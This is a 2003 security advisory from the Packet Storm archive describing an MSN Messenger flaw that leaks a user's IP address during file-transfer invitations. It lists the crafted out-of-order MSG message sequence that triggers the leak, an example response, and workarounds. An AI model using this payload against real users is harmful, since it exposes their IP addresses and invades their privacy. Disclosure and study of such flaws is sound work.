exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

msnbug.txt

msnbug.txt
Posted Nov 25, 2003
Authored by Hi_Tech_Assassin, Brice aka THR

A bug exists in MSN's Messenger client that allows a user's IP address to be exposed due to improper parsing of the Ip-Address field when parsing requests.

tags | exploit
SHA-256 | 11b8007718efec8768261dc195d3d80f9c2678aab4655d151fba650b133b883d

msnbug.txt

Change Mirror Download
MSN Messenger  bug

Release Date:
20/11/03

Discovery date:
Sometime around 2001 or 2000

Versions Affected:
------------------

Msn messenger 1.0 -> msn messenger 6.0.0602
Windows messenger all versions

Not Affected:
------------

Msn Messenger 6.1, trillian, gaim

Description:
-----------

A bug exists in Microsofts msn messenger client.
MSN messenger improperly parses the fields during
file transfer invitation requests. Particularly
the request ip field. This makes it possible to
trick the msn client into giving *away* the users
ip address without him/her accepting the file
transfer first.

The bug happens when a specially crafted MSG requests
are issued to the switchboard server and then
relayed onto the client. Upon receiving each
request from the switchboard the client seems
to incorrectly process the Ip-Address field
without first waiting for userB to accept the
file that is being attempted to be sent. It seems
the reason for this bug is that the msn client
seems to unsafelly depend on client of userB to send the
sequences and fields in those sequences in the
order in which is expected. A malicious user however
could construct a program that sends them in the
incorrect order and requests userB for the ip
address before userB asks userA for its ip address
and userBs client will falselly hand out the ip
address. This circumvents the whole thing and
allows us to invade the users privacy by handing
out such sensitive info.

Below are example of *expected* exchange of data
(this however can be exploited)

Example:

>>> MSG 4 N 277
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Application-Name: File Transfer
Application-GUID: {5D3E02AB-6190-11d3-BBBB-00C04F795683}
Invitation-Command: INVITE
Invitation-Cookie: 33267
Application-File: readme.txt
Application-FileSize: 60904


<<< MSG example@passport.com Tim 179
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Invitation-Command: ACCEPT
Invitation-Cookie: 33267
Launch-Application: FALSE
Request-Data: IP-Address:


>>> MSG 4 N 238
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Invitation-Command: ACCEPT
Invitation-Cookie: 33267
IP-Address: 10.44.102.65
Port: 6891
AuthCookie: 93301
Launch-Application: FALSE
Request-Data: IP-Address:

However to exploit the bug we would send the below

"MSG 1 N 275\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"
"\r\n"
"Application-Name: File Transfer\r\n"
"Application-GUID: {5D3E02AB-6190-11d3-BBBB-00C04F795683}\r\n"
"Invitation-Command: INVITE\r\n"
"Invitation-Cookie: 1\r\n"
"Application-File: wanker.\xdd\xff\xcf\xee\xcd\x0a\x0fjpg\r\n"
"Application-FileSize: 10\r\n"
"MSG 2 N 191\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"
"\r\n"
"Invitation-Command: ACCEPT\r\n"
"Invitation-Cookie: 1\r\n"
"AuthCookie: 10\r\n"
"Launch-Application: FALSE\r\n"
"Request-Data: IP-Address:\r\n"
"MSG 3 N 143\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"
"\r\n"
"Invitation-Command: CANCEL\r\n"
"Invitation-Cookie: 1\r\n"
"Cancel-Code: TIMEOUT\r\n"

We should get a response of something like below

Invitation-Command: ACCEPT
Invitation-Cookie: 1
IP-Address: 81.131.24.31
Port: 6892
PortX: 11181
AuthCookie: 15784036
Launch-Application: FALSE
Request-Data: IP-Address:

Code will be made public sometime in the future to
demonstrate the bug.

Severity:
~~~~~~~~~

This bug has been activelly exploited in the wild.
Due to the transition to the new msnp protocol
however many of the variants that derived due to
sniffing of the original now do not work but it
is only a matter of time when a new version is
made widelly available.

Possible fix/workaround:
~~~~~~~~~~~~~~~~~~~~~~~

The problem may be fixed to some extend by using the
messenger disallow list to block any uninvited users
that are not on your allow list. This way you cannot
be exploited unless you specifically trust the user
and he is on your allow list.

A mechanism must be included in the msn messenger
client implementation that first checks that userB
has accepted the file userA is trying to send
before processing the Request-Data: Ip-Address:
field. It seems pretty sad that MS cannot even
get this right even if its later rather than sooner,
especially when all third party clients seem to have
such a mechanism in place thats worked effectivelly.
I have tested this technique extensivelly with others
such as trillian and these seem to be safe.

Upgrade to msn messenger 6.1

Credit:
Discovery: Brice aka THR

Feedback
Please send suggestions or comments to:

hi_tech_assassin@hackermail.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close